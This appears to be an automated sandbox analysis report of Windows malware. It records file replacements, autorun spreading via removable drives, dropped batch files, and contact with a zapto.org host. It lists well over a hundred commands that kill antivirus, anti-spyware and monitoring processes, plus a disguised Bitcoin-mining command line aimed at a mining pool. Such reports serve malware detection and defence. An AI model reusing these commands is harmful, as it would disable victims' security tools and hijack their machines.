Technical Information
- <SYSTEM32>\dllcache\taskmgr.exe with <SYSTEM32>\dllcache\taskmgr.exe.new
- <SYSTEM32>\taskmgr.exe with <SYSTEM32>\taskmgr.exe.new
- <Drive name for removable media>:\autorun.inf
- <Drive name for removable media>:\SandiskU3.exe
- <SYSTEM32>\tskill.exe /A f-prot
- <SYSTEM32>\taskkill.exe /f /im etrustcipe.exe
- <SYSTEM32>\tskill.exe /A etrustcipe
- <SYSTEM32>\taskkill.exe /f /im f-stopw.exe
- <SYSTEM32>\tskill.exe /A f-stopw
- <SYSTEM32>\taskkill.exe /f /im f-prot.exe
- <SYSTEM32>\taskkill.exe /f /im espwatch.exe
- <SYSTEM32>\taskkill.exe /f /im escanhtn.exe
- <SYSTEM32>\tskill.exe /A escanhnt
- <SYSTEM32>\taskkill.exe /f /im ecengine.exe
- <SYSTEM32>\tskill.exe /A espwatch
- <SYSTEM32>\taskkill.exe /f /im escanv95.exe
- <SYSTEM32>\tskill.exe /A escanv95
- <SYSTEM32>\taskkill.exe /f /im mcagent.exe
- <SYSTEM32>\tskill.exe /A mcagent
- <SYSTEM32>\taskkill.exe /f /im mapisvc32.exe
- <SYSTEM32>\tskill.exe /A mcshield
- <SYSTEM32>\taskkill.exe /f /im mcmnhdlr.exe
- <SYSTEM32>\tskill.exe /A mcmnhdlr
- <SYSTEM32>\tskill.exe /A mapisvc32
- <SYSTEM32>\taskkill.exe /f /im guarddog.exe
- <SYSTEM32>\tskill.exe /A guard
- <SYSTEM32>\taskkill.exe /f /im guard
- <SYSTEM32>\taskkill.exe /f /im icmon.exe
- <SYSTEM32>\tskill.exe /A icmon
- <SYSTEM32>\tskill.exe /A guarddog
- <SYSTEM32>\tskill.exe /A ecengine
- <SYSTEM32>\taskkill.exe /f /im wireshark.exe
- <SYSTEM32>\tskill.exe /A wireshark
- <SYSTEM32>\taskkill.exe /f /im connectionmonitor.exe
- <SYSTEM32>\tskill.exe /A cmesys
- <SYSTEM32>\taskkill.exe /f /im cmgrdian.exe
- <SYSTEM32>\tskill.exe /A cmgrdian
- <SYSTEM32>\tskill.exe /A connectionmonitor
- <SYSTEM32>\tskill.exe /A click
- <SYSTEM32>\taskkill.exe /f /im cleanpc.exe
- <SYSTEM32>\tskill.exe /A cleanpc
- <SYSTEM32>\taskkill.exe /f /im ctrl.exe
- <SYSTEM32>\tskill.exe /A ctrl
- <SYSTEM32>\taskkill.exe /f /im click.exe
- <SYSTEM32>\tskill.exe /A ethereal
- <SYSTEM32>\taskkill.exe /f /im defalert.exe
- <SYSTEM32>\tskill.exe /A defalert
- <SYSTEM32>\taskkill.exe /f /im esafe.exe
- <SYSTEM32>\tskill.exe /A esafe
- <SYSTEM32>\taskkill.exe /f /im ethereal.exe
- <SYSTEM32>\taskkill.exe /f /im deputy.exe
- <SYSTEM32>\taskkill.exe /f /im defwatch.exe
- <SYSTEM32>\tskill.exe /A defwatch
- <SYSTEM32>\taskkill.exe /f /im cmesys.exe
- <SYSTEM32>\tskill.exe /A deputy
- <SYSTEM32>\taskkill.exe /f /im defscangui.exe
- <SYSTEM32>\tskill.exe /A defscangui
- <SYSTEM32>\tskill.exe /f /im md.exe
- <SYSTEM32>\tskill.exe /f /im mcvsrte.exe
- <SYSTEM32>\tskill.exe /pid=3060
- <SYSTEM32>\taskkill.exe /pid=4908
- <SYSTEM32>\tskill.exe /pid=5864
- <SYSTEM32>\tskill.exe /pid=1360
- <SYSTEM32>\tskill.exe /pid=3364
- <SYSTEM32>\tskill.exe /f /im defscangui.exe
- <SYSTEM32>\taskkill.exe /A defscangui
- <SYSTEM32>\tskill.exe /f /im clean.exe
- <SYSTEM32>\tskill.exe /pid=5580
- <SYSTEM32>\tskill.exe /pid=4172
- <SYSTEM32>\tskill.exe /f /im esafe.exe
- <SYSTEM32>\tskill.exe /f /im _avpm
- <SYSTEM32>\tskill.exe /pid=5032
- <SYSTEM32>\tskill.exe /f /im _avpcc.exe
- <SYSTEM32>\taskkill.exe /pid=1172
- <SYSTEM32>\tskill.exe /f /im avgctrl.exe
- <SYSTEM32>\tskill.exe /pid=2776
- <SYSTEM32>\tskill.exe /pid=1284
- <SYSTEM32>\tskill.exe stop aawservice
- <SYSTEM32>\tskill.exe /pid=4740
- <SYSTEM32>\taskkill.exe /pid=4508
- <SYSTEM32>\taskkill.exe /pid=808
- <SYSTEM32>\tskill.exe /pid=4628
- <SYSTEM32>\tskill.exe /f /im avp.exe
- <SYSTEM32>\tskill.exe /pid=4736
- <SYSTEM32>\taskkill.exe /f /im md.exe
- <SYSTEM32>\tskill.exe /A mcvsshld
- <SYSTEM32>\taskkill.exe /f /im mcvsshld.exe
- <SYSTEM32>\tskill.exe /A monitor
- <SYSTEM32>\taskkill.exe /f /im monitor.exe
- <SYSTEM32>\tskill.exe /A md
- <SYSTEM32>\taskkill.exe /f /im mcvsrte.exe
- <SYSTEM32>\tskill.exe /A mctool
- <SYSTEM32>\taskkill.exe /f /im mctool.exe
- <SYSTEM32>\taskkill.exe /f /im mcshield.exe
- <SYSTEM32>\tskill.exe /A mcvsrte
- <SYSTEM32>\tskill.exe /A mcupdate
- <SYSTEM32>\taskkill.exe /f /im mcupdate.exe
- <SYSTEM32>\taskkill.exe /f /im nprotect.exe
- <SYSTEM32>\tskill.exe /A nprotect
- <SYSTEM32>\taskkill.exe /f /im notstart.exe
- <SYSTEM32>\taskkill.exe /pid=4560
- <SYSTEM32>\taskkill.exe /pid=4604
- <SYSTEM32>\cmd.exe /c C:\Users\Public\cpx.bat
- <SYSTEM32>\tskill.exe /A notstart
- <SYSTEM32>\tskill.exe /A normist
- <SYSTEM32>\taskkill.exe /f /im nod32.exe
- <SYSTEM32>\tskill.exe /A nod32
- <SYSTEM32>\taskkill.exe /f /im norton*.exe
- <SYSTEM32>\tskill.exe /A norton*
- <SYSTEM32>\taskkill.exe /f /im normist.exe
- <SYSTEM32>\taskkill.exe /f /im threatwork.exe
- <SYSTEM32>\tskill.exe /A Ad-Aware
- <SYSTEM32>\taskkill.exe /f /im Ad-Aware.exe
- <SYSTEM32>\tskill.exe /A avp
- <SYSTEM32>\taskkill.exe /f /im avp.exe
- <SYSTEM32>\tskill.exe /A threatwork
- <SYSTEM32>\net.exe stop aawservice
- <SYSTEM32>\taskkill.exe /f /im AAWService.exe
- <SYSTEM32>\tskill.exe /A mbam
- <SYSTEM32>\taskkill.exe /f /im mbam.exe
- <SYSTEM32>\tskill.exe /A AAWTray
- <SYSTEM32>\taskkill.exe /f /im AAWTray.exe
- <SYSTEM32>\tskill.exe /A AAWService
- <SYSTEM32>\tskill.exe /A _avpm
- <SYSTEM32>\taskkill.exe /f /im SUPERAntiSpyware.exe
- <SYSTEM32>\tskill.exe /A SUPERAntiSpyware
- <SYSTEM32>\tskill.exe /A agentsvr
- <SYSTEM32>\tskill.exe /A alertsvc
- <SYSTEM32>\taskkill.exe /f /im _avpm
- <SYSTEM32>\taskkill.exe /f /im _avpcc.exe
- <SYSTEM32>\taskkill.exe /f /im MSASCui.exe
- <SYSTEM32>\tskill.exe /A MSASCui
- <SYSTEM32>\net1.exe stop aawservice
- <SYSTEM32>\tskill.exe /A _avpcc
- <SYSTEM32>\taskkill.exe /f /im _avp32.exe
- <SYSTEM32>\tskill.exe /A _avp32
- <SYSTEM32>\tskill.exe /A Update
- <SYSTEM32>\cmd.exe /c C:\Users\Public\instmnr.bat
- <SYSTEM32>\taskkill.exe /f /im regedit.exe
- <SYSTEM32>\taskkill.exe /f /im <Virus name>.exe
- <SYSTEM32>\taskkill.exe /f /im msconfig.exe
- <SYSTEM32>\tskill.exe /A msconfig
- <SYSTEM32>\tskill.exe /A <Virus name>
- <SYSTEM32>\tskill.exe /A regedit
- <SYSTEM32>\cmd.exe /c C:\Users\Public\aiasodjfapughaw.bat
- <SYSTEM32>\tskill.exe /A smxss
- <SYSTEM32>\cmd.exe /c C:\mkxxosrw.bat
- <SYSTEM32>\taskkill.exe /f /im taskmgr.exe
- <SYSTEM32>\taskkill.exe /f /im smxss.exe
- <SYSTEM32>\tskill.exe /A taskmgr
- <SYSTEM32>\tskill.exe /A SpybotSD
- <SYSTEM32>\taskkill.exe /f /im SpybotSD.exe
- <SYSTEM32>\tskill.exe /A TeaTimer
- <SYSTEM32>\taskkill.exe /f /im Update.exe
- <SYSTEM32>\tskill.exe /A SUpdate
- <SYSTEM32>\taskkill.exe /f /im SUpdate.exe
- <SYSTEM32>\taskkill.exe /f /im TeaTimer.exe
- <SYSTEM32>\tskill.exe /A ccleaner
- <SYSTEM32>\taskkill.exe /f /im fuckyou.exe
- <SYSTEM32>\tskill.exe /A fuckyou
- <SYSTEM32>\svchost.exe -T 98 -o http://Je############uckerhead:x@mine3.btcguild.com:8332/
- <SYSTEM32>\cmd.exe /c C:\Users\Public\load.bat
- <SYSTEM32>\taskkill.exe /f /im ccleaner.exe
- <SYSTEM32>\taskkill.exe /f /im avltmain.exe
- <SYSTEM32>\tskill.exe /A avltmain
- <SYSTEM32>\taskkill.exe /f /im avkwctl9.exe
- <SYSTEM32>\tskill.exe /A blackice
- <SYSTEM32>\taskkill.exe /f /im avwin.exe
- <SYSTEM32>\tskill.exe /A avwin
- <SYSTEM32>\tskill.exe /A avkwctl9
- <SYSTEM32>\tskill.exe /A avkserv
- <SYSTEM32>\taskkill.exe /f /im avkpop.exe
- <SYSTEM32>\tskill.exe /A avkpop
- <SYSTEM32>\taskkill.exe /f /im avkservice.exe
- <SYSTEM32>\tskill.exe /A avkservice
- <SYSTEM32>\taskkill.exe /f /im avkserv.exe
- <SYSTEM32>\tskill.exe /A cleaner
- <SYSTEM32>\taskkill.exe /f /im clean.exe
- <SYSTEM32>\tskill.exe /A clean
- <SYSTEM32>\taskkill.exe /f /im cleaner3.exe
- <SYSTEM32>\tskill.exe /A cleaner3
- <SYSTEM32>\taskkill.exe /f /im cleaner.exe
- <SYSTEM32>\taskkill.exe /f /im bd_professional.exe
- <SYSTEM32>\taskkill.exe /f /im bidef.exe
- <SYSTEM32>\tskill.exe /A bidef
- <SYSTEM32>\taskkill.exe /f /im blackice.exe
- <SYSTEM32>\tskill.exe /A bd_professional
- <SYSTEM32>\taskkill.exe /f /im bidserver.exe
- <SYSTEM32>\tskill.exe /A bidserver
- <SYSTEM32>\taskkill.exe /f /im avgw.exe
- <SYSTEM32>\tskill.exe /A avgcc32
- <SYSTEM32>\taskkill.exe /f /im ave32.exe
- <SYSTEM32>\tskill.exe /A ave32
- <SYSTEM32>\taskkill.exe /f /im avgctrl.exe
- <SYSTEM32>\tskill.exe /A avgctrl
- <SYSTEM32>\taskkill.exe /f /im avgcc32.exe
- <SYSTEM32>\taskkill.exe /f /im avconsol.exe
- <SYSTEM32>\taskkill.exe /f /im amon9x.exe
- <SYSTEM32>\tskill.exe /A amon9x
- <SYSTEM32>\taskkill.exe /f /im agentsvr.exe
- <SYSTEM32>\tskill.exe /A avconsol
- <SYSTEM32>\taskkill.exe /f /im autotrace.exe
- <SYSTEM32>\tskill.exe /A autotrace
- <SYSTEM32>\taskkill.exe /f /im avgserv9.exe
- <SYSTEM32>\tskill.exe /A avgserv9
- <SYSTEM32>\taskkill.exe /f /im avgserv.exe
- <SYSTEM32>\tskill.exe /A avgw
- <SYSTEM32>\taskkill.exe /f /im avguard.exe
- <SYSTEM32>\tskill.exe /A avguard
- <SYSTEM32>\tskill.exe /A avgserv
- <SYSTEM32>\tskill.exe /A avgnt
- <SYSTEM32>\taskkill.exe /f /im avgemc.exe
- <SYSTEM32>\tskill.exe /A avgemc
- <SYSTEM32>\taskkill.exe /f /im avgrsx.exe
- <SYSTEM32>\tskill.exe /A avgrsx
- <SYSTEM32>\taskkill.exe /f /im avgnt.exe
- <SYSTEM32>\net.exe
- <SYSTEM32>\taskkill.exe
- <SYSTEM32>\tskill.exe
- AVGCTRL.EXE
- GUARD.EXE
- MCAGENT.EXE
- nod32.exe
- AVGCTRL.EXE
- AVP.COM
- AVP.EXE
- AVGCC32.EXE
- ClassName: 'PROCMON_WINDOW_CLASS' WindowName: ''
- ClassName: 'RegMonClass' WindowName: ''
- ClassName: 'FileMonClass' WindowName: ''
- C:\Users\Public\ar.i
- C:\Users\Public\load.bat
- C:\Users\Public\ojgasog.bat
- C:\autorun.inf
- C:\SandiskU3.exe
- C:\Users\Public\cpx.bat
- C:\Users\Public\instlx9xz7b8x.txt
- C:\mkxxosrw.bat
- %ALLUSERSPROFILE%\Application Data\TEMP:D56FBB0B
- C:\Users\Public\instmnr.bat
- C:\Users\Public\smxss.exe
- C:\Users\Public\aiasodjfapughaw.bat
- C:\Users\Public\ar.i
- <SYSTEM32>\fuckyou.exe
- C:\Users\Public\smxss.exe
- from <SYSTEM32>\taskmgr.exe to <SYSTEM32>\fuckyou.exe
- 'jb###.zapto.org':21
- 'localhost':1035
- DNS ASK jb###.zapto.org
- ClassName: '' WindowName: ''
- ClassName: 'MS_WINHELP' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''